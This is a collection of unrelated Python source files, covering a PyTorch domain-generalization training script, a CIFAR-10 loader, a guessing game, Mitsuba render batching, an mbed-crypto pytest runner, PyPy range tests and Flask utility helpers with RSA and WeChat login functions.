enumerate(test_loader): # get the inputs x, y = x.to(device), y.to(device) y_hat = model(x) ys.append(y) yhats.append(y_hat) metas.append(meta) ypreds, ys, metas = predict_fn(torch.cat(yhats)), torch.cat(ys), torch.cat(metas) if save_ypred: if args.dataset == 'poverty': save_name = f"{args.dataset}_split:{loader_type}_fold:" \ f"{['A', 'B', 'C', 'D', 'E'][args.seed]}" \ f"_epoch:best_pred.csv" else: save_name = f"{args.dataset}_split:{loader_type}_seed:" \ f"{args.seed}_epoch:best_pred.csv" with open(f"{runPath}/{save_name}", 'w') as f: writer = csv.writer(f) writer.writerows(ypreds.unsqueeze(1).cpu().tolist()) test_val = test_loader.dataset.eval(ypreds.cpu(), ys.cpu(), metas) agg[f'{loader_type}_stat'].append(test_val[0][args.selection_metric]) if verbose: print(f"=============== {loader_type} ===============\n{test_val[-1]}") if __name__ == '__main__': if args.algorithm == 'fish' and args.pretrain_iters != 0: print("="*30 + "ERM pretrain" + "="*30) pretrain(train_loader, args.pretrain_iters) print("="*30 + f"Training: {args.algorithm}" + "="*30) train = locals()[f'train_{args.algorithm}'] agg = defaultdict(list) agg['val_stat'] = [0.] for epoch in range(args.epochs): train(train_loader, epoch, agg) test(val_loader, agg, loader_type='val') test(test_loader, agg, loader_type='test') save_best_model(model, runPath, agg, args) model.load_state_dict(torch.load(runPath + '/model.rar')) print('Finished training! Loading best model...') for split, loader in tv_loaders.items(): test(loader, agg, loader_type=split, save_ypred=True)
import copy import argparse import datetime import json import os import sys import csv import tqdm from collections import defaultdict from tempfile import mkdtemp import numpy as np import torch import torch.optim as optim import models from config import dataset_defaults from utils import unpack_data, sample_domains, save_best_model, \ Logger, return_predict_fn, return_criterion, fish_step runId = datetime.datetime.now().isoformat().replace(':', '_') torch.backends.cudnn.benchmark = True parser = argparse.ArgumentParser(description='Gradient Matching for Domain Generalization.') # General parser.add_argument('--dataset', type=str, help="Name of dataset, choose from amazon, camelyon, " "cdsprites, civil, fmow, iwildcam, poverty") parser.add_argument('--algorithm', type=str, help='training scheme, choose between fish or erm.') parser.add_argument('--experiment', type=str, default='.', help='experiment name, set as . for automatic naming.') parser.add_argument('--data-dir', type=str, help='path to data dir') parser.add_argument('--stratified', action='store_true', default=False, help='whether to use stratified sampling for classes') parser.add_argument('--num-domains', type=int, default=15, help='Number of domains, only specify for cdsprites') # Computation parser.add_argument('--no-cuda', action='store_true', default=False, help='disables CUDA use') parser.add_argument('--seed', type=int, default=-1, help='random seed, set as -1 for random.') args = parser.parse_args() args.cuda = not args.no_cuda and torch.cuda.is_available() device = torch.device("cuda" if args.cuda else "cpu") args_dict = args.__dict__ args_dict.update(dataset_defaults[args.dataset]) args = argparse.Namespace(**args_dict) # Choosing and saving a random seed for reproducibility if args.seed == -1: args.seed = int(torch.randint(0, 2 ** 32 - 1, (1,)).item()) torch.manual_seed(args.seed) np.random.seed(args.seed) torch.cuda.manual_seed_all(args.seed) torch.manual_seed(args.seed) torch.backends.cudnn.deterministic = True # experiment directory setup args.experiment = f"{args.dataset}_{args.algorithm}" \ if args.experiment == '.' else args.experiment directory_name = '../experiments/{}'.format(args.experiment) if not os.path.exists(directory_name): os.makedirs(directory_name) runPath = mkdtemp(prefix=runId, dir=directory_name) # logging setup sys.stdout = Logger('{}/run.log'.format(runPath)) print('RunID:' + runPath) with open('{}/args.json'.format(runPath), 'w') as fp: json.dump(args.__dict__, fp) torch.save(args, '{}/args.rar'.format(runPath)) # load model modelC = getattr(models, args.dataset) train_loader, tv_loaders = modelC.getDataLoaders(args, device=device) val_loader, test_loader = tv_loaders['val'], tv_loaders['test'] model = modelC(args, weights=None).to(device) assert args.optimiser in ['SGD', 'Adam'], "Invalid choice of optimiser, choose between 'Adam' and 'SGD'" opt = getattr(optim, args.optimiser) optimiserC = opt(model.parameters(), **args.optimiser_args) predict_fn, criterion = return_predict_fn(args.dataset), return_criterion(args.dataset) def pretrain(train_loader, pretrain_iters): aggP = defaultdict(list) aggP['val_stat'] = [0.] n_iters = 0 pretrain_epochs = int(np.ceil(pretrain_iters/len(train_loader))) pbar = tqdm.tqdm(total = pretrain_iters) for epoch in range(pretrain_epochs): for i, data in enumerate(train_loader): model.train() # get the inputs x, y = unpack_data(data, device) optimiserC.zero_grad() y_hat = model(x) loss = criterion(y_hat, y) loss.backward() optimiserC.step() n_iters += 1 # display progress pbar.set_description(f"Pretrain {n_iters}/{pretrain_iters} iters") pbar.update(1) if (i + 1) % args.print_iters == 0 and args.print_iters != -1: test(val_loader, aggP, loader_type='val', verbose=False) test(test_loader, aggP, loader_type='test', verbose=False) save_best_model(model, runPath, aggP, args) if n_iters == pretrain_iters: test(val_loader, aggP, loader_type='val', verbose=False) test(test_loader, aggP, loader_type='test', verbose=False) save_best_model(model, runPath, aggP, args) break pbar.close() model.load_state_dict(torch.load(runPath + '/model.rar')) print('Finished ERM pre-training!') def train_erm(train_loader, epoch, agg): running_loss = 0 total_iters = len(train_loader) print('\n====> Epoch: {:03d} '.format(epoch)) for i, data in enumerate(train_loader): model.train() # get the inputs x, y = unpack_data(data, device) optimiserC.zero_grad() y_hat = model(x) loss = criterion(y_hat, y) loss.backward() optimiserC.step() running_loss += loss.item() # print statistics if (i + 1) % args.print_iters == 0 and args.print_iters != -1 and args.algorithm != 'fish': agg['train_loss'].append(running_loss / args.print_iters) agg['train_iters'].append(i+1+epoch*total_iters) print('iteration {:05d}/{:d}: loss: {:6.3f}'.format(i + 1, total_iters, running_loss / args.print_iters)) test(val_loader, agg, loader_type='val') test(test_loader, agg, loader_type='test') running_loss = 0.0 save_best_model(model, runPath, agg, args) def train_fish(train_loader, epoch, agg): model.train() train_loader.dataset.reset_batch() i = 0 print('\n====> Epoch: {:03d} '.format(epoch)) opt_inner_pre = None while sum([l > 1 for l in train_loader.dataset.batches_left.values()]) >= args.meta_steps: i += 1 # sample `meta_steps` number of domains to use for the inner loop domains = sample_domains(train_loader, args.meta_steps, args.stratified).tolist() # prepare model for inner loop update model_inner = copy.deepcopy(model) model_inner.train() opt_inner = opt(model_inner.parameters(), **args.optimiser_args) if opt_inner_pre is not None and args.reload_inner_optim: opt_inner.load_state_dict(opt_inner_pre) # inner loop update for domain in domains: data = train_loader.dataset.get_batch(domain) x, y = unpack_data(data, device) opt_inner.zero_grad() y_hat = model_inner(x) loss = criterion(y_hat, y) loss.backward() opt_inner.step() opt_inner_pre = opt_inner.state_dict() # fish update meta_weights = fish_step(meta_weights=model.state_dict(), inner_weights=model_inner.state_dict(), meta_lr=args.meta_lr / args.meta_steps) model.reset_weights(meta_weights) # log the number of batches left for each domain for domain in domains: train_loader.dataset.batches_left[domain] = \ train_loader.dataset.batches_left[domain] - 1 \ if train_loader.dataset.batches_left[domain] > 1 else 1 if (i + 1) % args.print_iters == 0 and args.print_iters != -1: print(f'iteration {(i + 1):05d}: ') test(val_loader, agg, loader_type='val') test(test_loader, agg, loader_type='test') model.train() save_best_model(model, runPath, agg, args) def test(test_loader, agg, loader_type='test', verbose=True, save_ypred=False): model.eval() yhats, ys, metas = [], [], [] with torch.no_grad(): for i, (x, y, meta) in enumerate(test_loader): # get the inputs x, y = x.to(device), y.to(device) y_hat = model(x) ys.append(y) yhats.append(y_hat) metas.append(meta) ypreds, ys, metas = predict_fn(torch.cat(yhats)), torch.cat(ys), torch.cat(metas) if save_ypred: if args.dataset == 'poverty': save_name = f"{args.dataset}_split:{loader_type}_fold:" \ f"{['A', 'B', 'C', 'D', 'E'][args.seed]}" \ f"_epoch:best_pred.csv" else: save_name = f"{args.dataset}_split:{loader_type}_seed:" \ f"{args.seed}_epoch:best_pred.csv" with open(f"{runPath}/{save_name}", 'w') as f: writer = csv.writer(f) writer.writerows(ypreds.unsqueeze(1).cpu().tolist()) test_val = test_loader.dataset.eval(ypreds.cpu(), ys.cpu(), metas) agg[f'{loader_type}_stat'].append(test_val[0][args.selection_metric]) if verbose: print(f"=============== {loader_type} ===============\n{test_val[-1]}") if __name__ == '__main__': if args.algorithm == 'fish' and args.pretrain_iters != 0: print("="*30 + "ERM pretrain" + "="*30) pretrain(train_loader, args.pretrain_iters) print("="*30 + f"Training: {args.algorithm}" + "="*30) train = locals()[f'train_{args.algorithm}'] agg = defaultdict(list) agg['val_stat'] = [0.] for epoch in range(args.epochs): train(train_loader, epoch, agg) test(val_loader, agg, loader_type='val') test(test_loader, agg, loader_type='test') save_best_model(model, runPath, agg, args) model.load_state_dict(torch.load(runPath + '/model.rar')) print('Finished training! Loading best model...') for split, loader in tv_loaders.items(): test(loader, agg, loader_type=split, save_ypred=True)
en
0.601689
# General # Computation # Choosing and saving a random seed for reproducibility # experiment directory setup # logging setup # load model # get the inputs # display progress # get the inputs # print statistics # sample `meta_steps` number of domains to use for the inner loop # prepare model for inner loop update # inner loop update # fish update # log the number of batches left for each domain # get the inputs
1.924963
2
tfplus/data/cifar10.py
renmengye/tfplus
2
6618615
<filename>tfplus/data/cifar10.py from __future__ import division import cPickle as pkl import numpy as np import os import tfplus tfplus.cmd_args.add('cifar10:dataset_folder', 'str', '/ais/gobi4/mren/data/cifar10') class CIFAR10DataProvider(tfplus.data.data_provider.DataProvider): """ x: First divide by 255, then substract pixel mean. """ def __init__(self, split='train', filename=None): super(CIFAR10DataProvider, self).__init__() self.log = tfplus.utils.logger.get() if split is None: self.split = 'train' else: self.split = split self.log.info('Data split: {}'.format(self.split)) self.filename = filename self._images = None self._labels = None self.register_option('cifar10:dataset_folder') pass def init_data(self): if self.split == 'train': self._images = np.zeros([50000, 32, 32, 3], dtype='uint8') self._labels = np.zeros([50000], dtype='int') for batch in xrange(5): fname = os.path.join(self.get_option( 'cifar10:dataset_folder'), 'data_batch_{}'.format( batch + 1)) start = batch * 10000 end = (batch + 1) * 10000 with open(fname, 'rb') as fo: _data = pkl.load(fo) self._images[start: end] = _data['data'].reshape( [10000, 3, 32, 32]).transpose([0, 2, 3, 1]) self._labels[start: end] = np.array(_data['labels']) elif self.split == 'test': fname = os.path.join(self.get_option( 'cifar10:dataset_folder'), 'test_batch') with open(fname, 'rb') as fo: _data = pkl.load(fo) self._images = _data['data'].reshape( [10000, 3, 32, 32]).transpose([0, 2, 3, 1]) self._labels = np.array(_data['labels']) pass else: raise Exception('Unknown split: {}'.format(self.split)) # self._images = (self._images / 255).astype('float32') self._images = self._images.astype('float32') if self.split == 'train': self._pixel_mean = self._images.mean(axis=0) else: _images = np.zeros([50000, 32, 32, 3], dtype='uint8') for batch in xrange(5): fname = os.path.join(self.get_option( 'cifar10:dataset_folder'), 'data_batch_{}'.format( batch + 1)) start = batch * 10000 end = (batch + 1) * 10000 with open(fname, 'rb') as fo: _data = pkl.load(fo) _images[start: end] = _data['data'].reshape( [10000, 3, 32, 32]).transpose([0, 2, 3, 1]) # self._pixel_mean = (_images / 255).astype('float32').mean(axis=0) self._pixel_mean = _images.astype('float32').mean(axis=0) _images = None self._images = self._images - self._pixel_mean # self._images = self._images / 255 pass def get_size(self): if self.split == 'train': return 50000 elif self.split == 'test': return 10000 else: raise Exception('Unknown split {}'.format(self.split)) def get_batch_idx(self, idx, **kwargs): if self._images is None: self.init_data() labels = self._labels[idx] y_gt = np.zeros([len(idx), 10], dtype='float32') y_gt[np.arange(len(idx)), labels] = 1.0 results = { 'x': self._images[idx], 'y_gt': y_gt } return results tfplus.data.data_provider.get_factory().register('cifar10', CIFAR10DataProvider) if __name__ == '__main__': print tfplus.data.data_provider.create_from_main('cifar10').get_batch( np.arange(5)) pass
<filename>tfplus/data/cifar10.py from __future__ import division import cPickle as pkl import numpy as np import os import tfplus tfplus.cmd_args.add('cifar10:dataset_folder', 'str', '/ais/gobi4/mren/data/cifar10') class CIFAR10DataProvider(tfplus.data.data_provider.DataProvider): """ x: First divide by 255, then substract pixel mean. """ def __init__(self, split='train', filename=None): super(CIFAR10DataProvider, self).__init__() self.log = tfplus.utils.logger.get() if split is None: self.split = 'train' else: self.split = split self.log.info('Data split: {}'.format(self.split)) self.filename = filename self._images = None self._labels = None self.register_option('cifar10:dataset_folder') pass def init_data(self): if self.split == 'train': self._images = np.zeros([50000, 32, 32, 3], dtype='uint8') self._labels = np.zeros([50000], dtype='int') for batch in xrange(5): fname = os.path.join(self.get_option( 'cifar10:dataset_folder'), 'data_batch_{}'.format( batch + 1)) start = batch * 10000 end = (batch + 1) * 10000 with open(fname, 'rb') as fo: _data = pkl.load(fo) self._images[start: end] = _data['data'].reshape( [10000, 3, 32, 32]).transpose([0, 2, 3, 1]) self._labels[start: end] = np.array(_data['labels']) elif self.split == 'test': fname = os.path.join(self.get_option( 'cifar10:dataset_folder'), 'test_batch') with open(fname, 'rb') as fo: _data = pkl.load(fo) self._images = _data['data'].reshape( [10000, 3, 32, 32]).transpose([0, 2, 3, 1]) self._labels = np.array(_data['labels']) pass else: raise Exception('Unknown split: {}'.format(self.split)) # self._images = (self._images / 255).astype('float32') self._images = self._images.astype('float32') if self.split == 'train': self._pixel_mean = self._images.mean(axis=0) else: _images = np.zeros([50000, 32, 32, 3], dtype='uint8') for batch in xrange(5): fname = os.path.join(self.get_option( 'cifar10:dataset_folder'), 'data_batch_{}'.format( batch + 1)) start = batch * 10000 end = (batch + 1) * 10000 with open(fname, 'rb') as fo: _data = pkl.load(fo) _images[start: end] = _data['data'].reshape( [10000, 3, 32, 32]).transpose([0, 2, 3, 1]) # self._pixel_mean = (_images / 255).astype('float32').mean(axis=0) self._pixel_mean = _images.astype('float32').mean(axis=0) _images = None self._images = self._images - self._pixel_mean # self._images = self._images / 255 pass def get_size(self): if self.split == 'train': return 50000 elif self.split == 'test': return 10000 else: raise Exception('Unknown split {}'.format(self.split)) def get_batch_idx(self, idx, **kwargs): if self._images is None: self.init_data() labels = self._labels[idx] y_gt = np.zeros([len(idx), 10], dtype='float32') y_gt[np.arange(len(idx)), labels] = 1.0 results = { 'x': self._images[idx], 'y_gt': y_gt } return results tfplus.data.data_provider.get_factory().register('cifar10', CIFAR10DataProvider) if __name__ == '__main__': print tfplus.data.data_provider.create_from_main('cifar10').get_batch( np.arange(5)) pass
en
0.533335
x: First divide by 255, then substract pixel mean. # self._images = (self._images / 255).astype('float32') # self._pixel_mean = (_images / 255).astype('float32').mean(axis=0) # self._images = self._images / 255
2.499104
2
mine/2.py
YueFangOfficial/python-jumpstart-course-entry
0
6618616
import random num = random.randint(0, 100) text = -1 while (text != num): text = int(input("Guess a number between 0 and 100: ")) if (text > num): print("Sorry but {} is HIGHER than the number".format(text)) elif (text < num): print("Sorry but {} is LOWER than the number".format(text)) print("YES! You've got it! The number is {}".format(text))
import random num = random.randint(0, 100) text = -1 while (text != num): text = int(input("Guess a number between 0 and 100: ")) if (text > num): print("Sorry but {} is HIGHER than the number".format(text)) elif (text < num): print("Sorry but {} is LOWER than the number".format(text)) print("YES! You've got it! The number is {}".format(text))
none
1
4.061827
4
utils/mitsuba_python.py
yikaiw/EIP
28
6618617
<reponame>yikaiw/EIP import os, sys sys.path.append('/Applications/Mitsuba.app/python/2.7') os.environ['PATH'] = 'path-to-mitsuba-directory' + os.pathsep + os.environ['PATH'] import mitsuba from mitsuba.core import * from mitsuba.render import SceneHandler from mitsuba.render import RenderQueue, RenderJob import multiprocessing data_dir = '/Users/home/Documents/works/deformable-objects/outputs/can_tactile/' target_dir = '/Users/home/Documents/works/deformable-objects/outputs/can_tactile/render0' # os.makedirs(target_dir, exist_ok=True) fileResolver = Thread.getThread().getFileResolver() fileResolver.appendPath(data_dir) paramMap = StringMap() paramMap['myParameter'] = 'value' scheduler = Scheduler.getInstance() for i in range(0, multiprocessing.cpu_count()): scheduler.registerWorker(LocalWorker(i, 'wrk%i' % i)) scheduler.start() for idx in range(7, 107): print('idx ' + str(idx)) f = open(os.path.join(data_dir, 'can_origin.xml'), 'r') content = f.read() content = content.replace('elastic_voxel', '%d_elastic_voxel' % idx) w = open(os.path.join(data_dir, 'can.xml'), 'w') w.write(content) f.close() w.close() scene = SceneHandler.loadScene(fileResolver.resolve('can.xml'), paramMap) queue = RenderQueue() scene.setDestinationFile(os.path.join(target_dir, 'renderedResult' + str(idx))) job = RenderJob('myRenderJob' + str(idx), scene, queue) job.start() queue.waitLeft(0) queue.join() # print(Statistics.getInstance().getStats())
import os, sys sys.path.append('/Applications/Mitsuba.app/python/2.7') os.environ['PATH'] = 'path-to-mitsuba-directory' + os.pathsep + os.environ['PATH'] import mitsuba from mitsuba.core import * from mitsuba.render import SceneHandler from mitsuba.render import RenderQueue, RenderJob import multiprocessing data_dir = '/Users/home/Documents/works/deformable-objects/outputs/can_tactile/' target_dir = '/Users/home/Documents/works/deformable-objects/outputs/can_tactile/render0' # os.makedirs(target_dir, exist_ok=True) fileResolver = Thread.getThread().getFileResolver() fileResolver.appendPath(data_dir) paramMap = StringMap() paramMap['myParameter'] = 'value' scheduler = Scheduler.getInstance() for i in range(0, multiprocessing.cpu_count()): scheduler.registerWorker(LocalWorker(i, 'wrk%i' % i)) scheduler.start() for idx in range(7, 107): print('idx ' + str(idx)) f = open(os.path.join(data_dir, 'can_origin.xml'), 'r') content = f.read() content = content.replace('elastic_voxel', '%d_elastic_voxel' % idx) w = open(os.path.join(data_dir, 'can.xml'), 'w') w.write(content) f.close() w.close() scene = SceneHandler.loadScene(fileResolver.resolve('can.xml'), paramMap) queue = RenderQueue() scene.setDestinationFile(os.path.join(target_dir, 'renderedResult' + str(idx))) job = RenderJob('myRenderJob' + str(idx), scene, queue) job.start() queue.waitLeft(0) queue.join() # print(Statistics.getInstance().getStats())
ru
0.09618
# os.makedirs(target_dir, exist_ok=True) # print(Statistics.getInstance().getStats())
1.950033
2
mbl-core/tests/libs/mbed-crypto/test_mbed-crypto.py
edmund-troche/mbl-core
5
6618618
#!/usr/bin/env python3 # Copyright (c) 2019 Arm Limited and Contributors. All rights reserved. # # SPDX-License-Identifier: BSD-3-Clause """Pytest for testing the mbed-crypto library. The actual tests should already be on the target, this script just runs them. """ import os import logging import pathlib import pytest import subprocess TESTS_PATH = pathlib.Path("/usr/lib/mbed-crypto/test") # For each test binary there is a corresponding ".datax" file. Enumerate # the datax files then remove the ".datax" suffix to get a list of tests. # convert the Paths to strings because that's what pytest.mark.parametrize # expects for test IDs. TESTS = [str(path.stem) for path in TESTS_PATH.glob("*.datax")] def test_mbed_crypto_tests_exist(): """Check that the test binaries are on the target""" assert TESTS @pytest.mark.parametrize("test", TESTS, ids=TESTS) def test_mbed_crypto(test): """Run a test binary on the target""" result = subprocess.run( [TESTS_PATH / test], check=False, cwd=TESTS_PATH, capture_output=True, text=True, ) if result.returncode != 0: logging.getLogger().error(result.stdout) assert result.returncode == 0
#!/usr/bin/env python3 # Copyright (c) 2019 Arm Limited and Contributors. All rights reserved. # # SPDX-License-Identifier: BSD-3-Clause """Pytest for testing the mbed-crypto library. The actual tests should already be on the target, this script just runs them. """ import os import logging import pathlib import pytest import subprocess TESTS_PATH = pathlib.Path("/usr/lib/mbed-crypto/test") # For each test binary there is a corresponding ".datax" file. Enumerate # the datax files then remove the ".datax" suffix to get a list of tests. # convert the Paths to strings because that's what pytest.mark.parametrize # expects for test IDs. TESTS = [str(path.stem) for path in TESTS_PATH.glob("*.datax")] def test_mbed_crypto_tests_exist(): """Check that the test binaries are on the target""" assert TESTS @pytest.mark.parametrize("test", TESTS, ids=TESTS) def test_mbed_crypto(test): """Run a test binary on the target""" result = subprocess.run( [TESTS_PATH / test], check=False, cwd=TESTS_PATH, capture_output=True, text=True, ) if result.returncode != 0: logging.getLogger().error(result.stdout) assert result.returncode == 0
en
0.743034
#!/usr/bin/env python3 # Copyright (c) 2019 Arm Limited and Contributors. All rights reserved. # # SPDX-License-Identifier: BSD-3-Clause Pytest for testing the mbed-crypto library. The actual tests should already be on the target, this script just runs them. # For each test binary there is a corresponding ".datax" file. Enumerate # the datax files then remove the ".datax" suffix to get a list of tests. # convert the Paths to strings because that's what pytest.mark.parametrize # expects for test IDs. Check that the test binaries are on the target Run a test binary on the target
2.203203
2
pypy/module/__builtin__/test/test_range.py
camillobruni/pygirl
12
6618619
import autopath class AppTestRange: def test_range_toofew(self): raises(TypeError, range) def test_range_toomany(self): raises(TypeError, range, 1, 2, 3, 4) def test_range_one(self): assert range(1) == [0] def test_range_posstartisstop(self): assert range(1, 1) == [] def test_range_negstartisstop(self): assert range(-1, -1) == [] def test_range_zero(self): assert range(0) == [] def test_range_twoargs(self): assert range(1, 2) == [1] def test_range_decreasingtwoargs(self): assert range(3, 1) == [] def test_range_negatives(self): assert range(-3) == [] def test_range_decreasing_negativestep(self): assert range(5, -2, -1) == [5, 4, 3, 2, 1, 0 , -1] def test_range_posfencepost1(self): assert range (1, 10, 3) == [1, 4, 7] def test_range_posfencepost2(self): assert range (1, 11, 3) == [1, 4, 7, 10] def test_range_posfencepost3(self): assert range (1, 12, 3) == [1, 4, 7, 10] def test_range_negfencepost1(self): assert range (-1, -10, -3) == [-1, -4, -7] def test_range_negfencepost2(self): assert range (-1, -11, -3) == [-1, -4, -7, -10] def test_range_negfencepost3(self): assert range (-1, -12, -3) == [-1, -4, -7, -10] def test_range_decreasing_negativelargestep(self): assert range(5, -2, -3) == [5, 2, -1] def test_range_increasing_positivelargestep(self): assert range(-5, 2, 3) == [-5, -2, 1] def test_range_zerostep(self): raises(ValueError, range, 1, 5, 0) def DONT_test_range_float(self): "How CPython does it - UGLY, ignored for now." assert range(0.1, 2.0, 1.1) == [0, 1] def test_range_wrong_type(self): raises(TypeError, range, "42")
import autopath class AppTestRange: def test_range_toofew(self): raises(TypeError, range) def test_range_toomany(self): raises(TypeError, range, 1, 2, 3, 4) def test_range_one(self): assert range(1) == [0] def test_range_posstartisstop(self): assert range(1, 1) == [] def test_range_negstartisstop(self): assert range(-1, -1) == [] def test_range_zero(self): assert range(0) == [] def test_range_twoargs(self): assert range(1, 2) == [1] def test_range_decreasingtwoargs(self): assert range(3, 1) == [] def test_range_negatives(self): assert range(-3) == [] def test_range_decreasing_negativestep(self): assert range(5, -2, -1) == [5, 4, 3, 2, 1, 0 , -1] def test_range_posfencepost1(self): assert range (1, 10, 3) == [1, 4, 7] def test_range_posfencepost2(self): assert range (1, 11, 3) == [1, 4, 7, 10] def test_range_posfencepost3(self): assert range (1, 12, 3) == [1, 4, 7, 10] def test_range_negfencepost1(self): assert range (-1, -10, -3) == [-1, -4, -7] def test_range_negfencepost2(self): assert range (-1, -11, -3) == [-1, -4, -7, -10] def test_range_negfencepost3(self): assert range (-1, -12, -3) == [-1, -4, -7, -10] def test_range_decreasing_negativelargestep(self): assert range(5, -2, -3) == [5, 2, -1] def test_range_increasing_positivelargestep(self): assert range(-5, 2, 3) == [-5, -2, 1] def test_range_zerostep(self): raises(ValueError, range, 1, 5, 0) def DONT_test_range_float(self): "How CPython does it - UGLY, ignored for now." assert range(0.1, 2.0, 1.1) == [0, 1] def test_range_wrong_type(self): raises(TypeError, range, "42")
none
1
2.944371
3
common/libs/utils.py
WengChaoxi/flask-mvc
1
6618620
<reponame>WengChaoxi/flask-mvc<filename>common/libs/utils.py # coding: utf-8 from flask import request, session, redirect, url_for, send_file, make_response #,jsonify from functools import wraps import json, platform, requests, rsa def handleData(): try: # data = request.get_data() # 获取前端数据 # data = str(data, 'utf-8') # 转utf-8 # data = json.loads(data) # json转字典 data = json.loads(request.get_data().decode("utf-8"), strict=False) # if data is None: # data = request.form.to_dic() # elif data is None: # data = json.loads(request.args().decode("utf-8"), strict=False) if data is None: data ={} return data except: return {} def msg(status_code, data=None, msg=None): data_dic = { 'code': status_code, } if data: data_dic['data'] = data if msg: data_dic['msg'] = msg # return jsonify(data_dic) return json.dumps(data_dic, ensure_ascii=False) def correctPath(path=''): slash = '/' # Linux路径分割 if platform.system() == 'Windows': slash = r'\\' path.replace('/', slash) elif platform.system() == 'Linux': path.replace(r'\\', slash) return path ''' def bytes2human(n): symbols = ('K','M','G','T','P','E','Z','Y') prefix = {} for i,s in enumerate(symbols): prefix[s] = 1<<(i+1)*10 for s in reversed(symbols): if n >= prefix[s]: value = float(n)/prefix[s] return '%.2f%s'%(value,s) return '%.2fB'%(n) ''' from math import log def bytes2human(n): if n==0: return '0.00B' symbols = ('B','K','M','G','T','P','E','Z','Y') index = int(log(n,2)//10) return '%.2f%s'%(float(n)/(1<<index*10), symbols[index]) def fileResponse(file_path, file_name=None): if not file_name: file_name = file_path.split(correctPath('/'))[-1] response = make_response(send_file(file_path)) # , as_attachment=True, attachment_filename='data.file')) response.headers["Cache-Control"] = "max-age=43200" response.headers["Content-Type"] = "application/octet-stream" from urllib import parse file_urlencode = parse.quote(file_name.encode('utf-8')) # 对中文进行URL编码 response.headers["Content-Disposition"] = "attachment; filename*=utf-8''%s" % (file_urlencode) # response.headers["Content-Length"] = "%d"%total_size return response def login_limit(func): # 装饰器:参数和返回值都是函数 @wraps(func) def inner(*args, **kwargs): if session.get('account'): return func(*args, **kwargs) else: return redirect(url_for('api_user.login')) return inner def getOpenid(code): if code: app_id = '' app_secret = '' req_params = { 'appid':app_id, 'secret':app_secret, 'js_code':code, 'grant_type': 'authorization_code' } wx_login_api = 'https://api.weixin.qq.com/sns/jscode2session' response = requests.get(wx_login_api, params=req_params) openid = response.json().get('openid') # 得到用户关于当前小程序的OpenID if openid: # session_key = data['session_key'] # return (openid, session_key) return openid return None def docResponse(path): resp = make_response(open(path).read()) resp.headers['Content-type'] = "application/json;charset=UTF-8" return resp class Rsa(): # def __init__(self, public_key=None, private_key=None): # self.public_key = public_key # self.private_key = private_key # def createRsaKeysPem(self, public_pem_save_path='./public_key.pem', private_pem_save_path='./private_key.pem', bytes=2048): # (pub_key, pri_key) = rsa.newkeys(bytes) # with open(public_pem_save_path, 'wb+') as f: # f.write(pub_key.save_pkcs1('PEM')) # with open(private_pem_save_path, 'wb+') as f: # f.write(pri_key.save_pkcs1('PEM')) # return (pub_key, pri_key) def fromPemLoadRsaPubKey(self, path): with open(path, 'rb') as f: pem = f.read() self.public_key = rsa.PublicKey.load_pkcs1(pem) return self.public_key # def fromPemLoadRsaPriKey(self, path): # with open(path, 'rb') as f: # pem = f.read() # self.private_key = rsa.PrivateKey.load_pkcs1(pem) # return self.private_key def encrypt(self, data, public_key=None): if public_key is None: public_key = self.public_key return rsa.encrypt(data, public_key) # def decrypt(self, data, private_key=None): # if private_key is None: # private_key = self.private_key # return rsa.decrypt(data, private_key) _rsa = Rsa()
# coding: utf-8 from flask import request, session, redirect, url_for, send_file, make_response #,jsonify from functools import wraps import json, platform, requests, rsa def handleData(): try: # data = request.get_data() # 获取前端数据 # data = str(data, 'utf-8') # 转utf-8 # data = json.loads(data) # json转字典 data = json.loads(request.get_data().decode("utf-8"), strict=False) # if data is None: # data = request.form.to_dic() # elif data is None: # data = json.loads(request.args().decode("utf-8"), strict=False) if data is None: data ={} return data except: return {} def msg(status_code, data=None, msg=None): data_dic = { 'code': status_code, } if data: data_dic['data'] = data if msg: data_dic['msg'] = msg # return jsonify(data_dic) return json.dumps(data_dic, ensure_ascii=False) def correctPath(path=''): slash = '/' # Linux路径分割 if platform.system() == 'Windows': slash = r'\\' path.replace('/', slash) elif platform.system() == 'Linux': path.replace(r'\\', slash) return path ''' def bytes2human(n): symbols = ('K','M','G','T','P','E','Z','Y') prefix = {} for i,s in enumerate(symbols): prefix[s] = 1<<(i+1)*10 for s in reversed(symbols): if n >= prefix[s]: value = float(n)/prefix[s] return '%.2f%s'%(value,s) return '%.2fB'%(n) ''' from math import log def bytes2human(n): if n==0: return '0.00B' symbols = ('B','K','M','G','T','P','E','Z','Y') index = int(log(n,2)//10) return '%.2f%s'%(float(n)/(1<<index*10), symbols[index]) def fileResponse(file_path, file_name=None): if not file_name: file_name = file_path.split(correctPath('/'))[-1] response = make_response(send_file(file_path)) # , as_attachment=True, attachment_filename='data.file')) response.headers["Cache-Control"] = "max-age=43200" response.headers["Content-Type"] = "application/octet-stream" from urllib import parse file_urlencode = parse.quote(file_name.encode('utf-8')) # 对中文进行URL编码 response.headers["Content-Disposition"] = "attachment; filename*=utf-8''%s" % (file_urlencode) # response.headers["Content-Length"] = "%d"%total_size return response def login_limit(func): # 装饰器:参数和返回值都是函数 @wraps(func) def inner(*args, **kwargs): if session.get('account'): return func(*args, **kwargs) else: return redirect(url_for('api_user.login')) return inner def getOpenid(code): if code: app_id = '' app_secret = '' req_params = { 'appid':app_id, 'secret':app_secret, 'js_code':code, 'grant_type': 'authorization_code' } wx_login_api = 'https://api.weixin.qq.com/sns/jscode2session' response = requests.get(wx_login_api, params=req_params) openid = response.json().get('openid') # 得到用户关于当前小程序的OpenID if openid: # session_key = data['session_key'] # return (openid, session_key) return openid return None def docResponse(path): resp = make_response(open(path).read()) resp.headers['Content-type'] = "application/json;charset=UTF-8" return resp class Rsa(): # def __init__(self, public_key=None, private_key=None): # self.public_key = public_key # self.private_key = private_key # def createRsaKeysPem(self, public_pem_save_path='./public_key.pem', private_pem_save_path='./private_key.pem', bytes=2048): # (pub_key, pri_key) = rsa.newkeys(bytes) # with open(public_pem_save_path, 'wb+') as f: # f.write(pub_key.save_pkcs1('PEM')) # with open(private_pem_save_path, 'wb+') as f: # f.write(pri_key.save_pkcs1('PEM')) # return (pub_key, pri_key) def fromPemLoadRsaPubKey(self, path): with open(path, 'rb') as f: pem = f.read() self.public_key = rsa.PublicKey.load_pkcs1(pem) return self.public_key # def fromPemLoadRsaPriKey(self, path): # with open(path, 'rb') as f: # pem = f.read() # self.private_key = rsa.PrivateKey.load_pkcs1(pem) # return self.private_key def encrypt(self, data, public_key=None): if public_key is None: public_key = self.public_key return rsa.encrypt(data, public_key) # def decrypt(self, data, private_key=None): # if private_key is None: # private_key = self.private_key # return rsa.decrypt(data, private_key) _rsa = Rsa()
en
0.318345
